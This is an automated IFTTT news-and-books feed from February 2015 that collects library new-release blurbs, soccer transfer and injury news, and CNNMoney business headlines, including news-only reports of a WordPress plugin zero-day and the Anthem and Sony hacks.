The Octonauts are in Antarctica - the coldest place on Earth - and the Adelie penguin chicks have just hatched. While the Adelie penguin parents go hunting for food, Captain Barnacles, Kwazii and Peso are babysitting the chicks. With icebergs moving, strong storms blowing and a little penguin with a pirate heart that wants to help hunt, this is no ordinary Octonaut mission.



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Black lace by Michelle, Nika, author.

Continues with the tumultuous world of the Beauvois sisters and their never ending whirlwind of drama. This time the snakes are striking even harder and their bites are even more venomous. Will the sisters crumble this time, or will their money and privilege always make a way for them to come out on top?



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Noro lace : 30 exquisite knits

Book Release: Letting go of self-destructive behaviors : a workbook of hope and healing by Ferentz, Lisa.

"Letting Go of Self-Destructive Behaviors offers inspiring, hopeful, creative resources for the millions of male and female adolescents and adults who struggle with eating disorders, addictions, any form of self-mutilation. It is also a workbook for the clinicians who treat them. Using journaling exercises, drawing and collaging prompts, guided imagery, visualizations, and other behavioral techniques, readers will learn how to understand, compassionately work with, and heal from their behaviors



Source: Baltimore County Public Library - New Books

via IFTTT

Stoke: Captain Ryan Shawcross ruled out of action for 'a couple of weeks' with a back injury (ESPN)

from ESPN http://m.espn.go.com/

via IFTTT

Zenit St Petersburg: Russian Premier League referee Alexei Matyunin cleared of racially abusing striker Hulk (ESPN)

from ESPN http://m.espn.go.com/

via IFTTT

Roma: Newly acquired forward Victor Ibarbo sidelined five weeks with a calf injury, ruling him out of up to seven games (ESPN)

from ESPN http://m.espn.go.com/

via IFTTT

Real Madrid: Centre-back Sergio Ramos sidelined for five weeks with torn hamstring, team confirms (ESPN)

from ESPN http://m.espn.go.com/

via IFTTT

I have a new follower on Twitter



Gefuso News

Gefuso.us enables you to in a quick way screen through several articles with a shorter content, containing the latest news in terms of business, finance, entrep



http://t.co/mUliasMKpN

Following: 7837 - Followers: 20792



February 06, 2015 at 10:50AM via Twitter http://ift.tt/1tVUGjb

MLS Update February 06, 2015 at 05:31AM

MLS Preseason Tracker: Matches, highlights, scores & news updates as they happen (February 6)


Preseason is officially underway, and we've got three games on the schedule today.


Read More



from MLSsoccer.com News http://ift.tt/1LUDe4z

via IFTTT

MLS Update February 06, 2015 at 04:59AM

WATCH LIVE: Toronto FC Designated Player Sebastian Giovinco's introductory press conference


Sebastian Giovinco stepped off the plane at Pearson International Airport on Thursday afternoon and was immediately mobbed by Reds supporters.


Read More



from MLSsoccer.com News http://ift.tt/1IhjNn5

via IFTTT

Book Release: The orphan sky by Leya, Ella.

"Set at the crossroads of Turkish, Persian, and Russian cultures under the red flag of Communism in the late 1970s, [this story] reveals one woman's struggle to reconcile her ideals with the corrupt world around her, and to decide whether to betray her country or her heart"--Amazon.com.



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Wifey's next hustle by Swinson, Kiki, author.

Kira gives up being "wifey" and heads down to South Beach, Florida to hustle and sell high-end cars at a luxury car dealership. Her clients are wealthy hedge fund investors and druggies. One druglord is her best and most lucrative customer. When it comes time to pay him back for keeping her pockets lined, she finds her debt comes at an expensive price and is forced to call in major reinforcements.



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Out of peel tree by Long, Laura (Professor of English)

"Moving through time and space, Out of Peel Tree unfolds the patterns of an Appalachian sensibility that reverberate everywhere: a fatalism balanced by humor and flinty, hard-won hope, an appreciation for the surprises of the everyday, and a search for love and home amid strange and familiar places and people. This innovative debut novel reveals the lives of a far-flung contemporary Appalachian family through a web of delicate turning points. A child discovers a grandmother she never knew has d



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Chasing gold by Hapka, Cathy, author.

Saving up money and time to visit a prestigious riding clinic, Haley pulls away from family and friends in order to pursue her dream.



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: German cooking now : 100 recipes for family-style meals by Nolen, Jeremy.

Thursday, February 5, 2015

Hundreds of Ford workers get $19,000 raise

Read full story for latest details.



from Business and financial news - CNNMoney.com http://ift.tt/1EFVoF3

via IFTTT

The money behind the vaccine medical myth

Well-funded family foundations are backing the movement to get parents to question vaccines.



from Business and financial news - CNNMoney.com http://ift.tt/16vJgIh

via IFTTT

Now and then: Faces of North Dakota's oil boom

CNNMoney revisits 4 locals we met in 2011, living in the western North Dakota oil boom.



from Business and financial news - CNNMoney.com http://ift.tt/1LQW2Sb

via IFTTT

WordPress Plugin Zero-Day Vulnerability Affects Thousands of Sites

A critical zero-day vulnerability has been discovered in a popular WordPress plugin, called 'FancyBox for WordPress', which is being used by hundreds of thousands of websites running on the most popular Blogging Platform Wordpress. 0-DAY FLAW EXPLOITED IN THE WILD The security researchers at network security firm Sucuri issued a warning Wednesday about the zero-day vulnerability that is





from The Hacker News http://ift.tt/1DJTBv8

via IFTTT

10 worst hacks of all time

The worst hacks ever include computer viruses, stolen credit cards, data breaches and embarrassing leaked memos.



from Business and financial news - CNNMoney.com http://ift.tt/1zSfJo1

via IFTTT

Book Release: Spectrum reading. Kindergarten.

Book Release: Spectrum spelling. Grade 3.

Reinforce your child's third-grade skills with Spectrum Spelling. With the progressive lessons in this workbook, your child will practice short vowels, long vowels, homophones, commonly used words, contractions, compound words, and dictionary skills. Engage your child with brainteasers, riddles, and puzzles in these full-color spelling lessons from Spectrum(R). Students in grades K-6 will find systematic instruction and practice in spelling patterns, spelling strategies, and spelling skills rela



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: The country of Ice Cream Star by Newman, Sandra, 1965-

Book Release: Spectrum writing. Grade 4.

Book Release: Spectrum sight words : Kindergarten.

Spectrum Sight Words helps young learners master the high frequency words that commonly appear in any text with practice.



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Grace

Nine-year-old Grace likes having a plan but she must find a way to be flexible and open to new ideas when she goes to Paris with her mother and has trouble getting along with her cousin, while at home her friends start the business she proposed without her.



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: The paper playhouse : awesome art projects for kids using paper, boxes, and books by Rodabaugh, Katrina.

I have a fiancé, a girlfriend and two boyfriends





from Business and financial news - CNNMoney.com http://ift.tt/1CUB2Uj

via IFTTT

MLS Update February 05, 2015 at 07:46AM

30 Days 'Til MLS: Which teams were best at holding a lead after 30 minutes in 2014?


It is just 30 short days to MLS 2015, but to look forward, we have to look back.


We all know grabbing a lead in the first 30 minutes of a game is great, but holding onto that lead is what can separate the playoff teams from those who miss out.


In two extreme cases in 2014, it made the difference between first place and the bottom of the standings.


Read More



from MLSsoccer.com News http://ift.tt/1BXP0TG

via IFTTT

Controversy grows over Williams' Iraq apology

Read full story for latest details.



from Business and financial news - CNNMoney.com http://ift.tt/1v1UjPm

via IFTTT

Amy Pascal out as Sony Pictures co-chair

Two months after a devastating cyber-attack, Sony Pictures Entertainment co-chairman Amy Pascal is stepping down from her post, the studio announced on Thursday.



from Business and financial news - CNNMoney.com http://ift.tt/16HkXaZ

via IFTTT

7 top stocks to buy in February

Read full story for latest details.



from Business and financial news - CNNMoney.com http://ift.tt/16HkZzB

via IFTTT

Anthem hacked, Wall Street shrugs

The data breach at health insurer Anthem is scary for consumers. Yet its stock barely budged. Companies who've been hacked don't tend to get punished by investors. But cybersecurity stocks surge.



from Business and financial news - CNNMoney.com http://ift.tt/1DiyKRw

via IFTTT

Russia + North Korea = New BFF?

Russia is looking to North Korea for business opportunities as relations with the West have soured.



from Business and financial news - CNNMoney.com http://ift.tt/1yNeked

via IFTTT

Book Release: Leopardpox! by Landau, Orna, 1968-

When Sadie, a kindergartner, suddenly turns into a frisky leopard cub, her mother and brothers take her to a doctor, a veterinarian, and even a zoo seeking a cure.



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Spectrum reading. Grade 1.

Book Release: Spectrum spelling. Kindergarten.

Reinforce your kindergartner's new skills with Spectrum Spelling. With the progressive lessons in this workbook, your child will practice letter recognition, short vowels, sight words, and dictionary skills. Engage your child with brainteasers, riddles, and puzzles in these full-color spelling lessons from Spectrum(R). Students in grades K-6 will find systematic instruction and practice in spelling patterns, spelling strategies, and spelling skills related to meaning and context. Each workbook a



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Spectrum cursive handwriting: grades 3-5

Tales from 'walking dead' RadioShack workers

Time appears to be running out for RadioShack as employees tell stories of demise of electronics chain.



from Business and financial news - CNNMoney.com http://ift.tt/1zcq9cR

via IFTTT

Bayern Munich centre-back Jerome Boateng handed three-match ban for Schalke red card (ESPN)

from ESPN http://ift.tt/VTgg6W

via IFTTT

Bayern to appeal 3-match ban for defender Jerome Boateng

FRANKFURT, Germany (AP) Bayern Munich says it plans to appeal against the three-match ban imposed on defender Jerome Boateng.



from FOX Sports Digital http://ift.tt/1zcnDTL

via IFTTT

Man City prefers Bony over Jovetic in Champions League squad

NYON, Switzerland (AP) Manchester City has made space for new signing Wilfried Bony in its Champions League squad by dropping Stevan Jovetic.



from FOX Sports Digital http://ift.tt/1zcnFuQ

via IFTTT

MLS Update February 05, 2015 at 06:35AM

Transfer Watch: French international Hatem Ben Arfa linked with New York City FC


With the hunt still on for their third Designated Player, expansion club New York City FC were linked on Thursday morning to 27-year-old French international Hatem Ben Arfa.


Read More



from MLSsoccer.com News http://ift.tt/18Rf5Nd

via IFTTT

MLS Update February 05, 2015 at 06:20AM

30 Days 'Til MLS: 30 things to watch for in the upcoming season


The 2015 MLS season is just 30 days away. Here are 30 things that have the staff here at MLSsoccer.com excited for things to get going.




1. EXPANDING OUR MINDS. Orlando City and New York City FC might be the most hyped pair of expansion teams in MLS history. Rightly so. Everyone's expecting big things. But on the field, will Year 1 see them go the way of the hapless 2005 Real Salt Lake side or the Cup-winning 1998 Chicago Fire?


Read More



from MLSsoccer.com News http://ift.tt/1ueN9Ms

via IFTTT

People hate the new Keurig ... and its stock

Keurig Green Mountain disappointed investors with weak sales and guidance. The stock is well off its caffeine high. A backlash against the new 2.0 machine could be a big problem.



from Business and financial news - CNNMoney.com http://ift.tt/1Cy4HpT

via IFTTT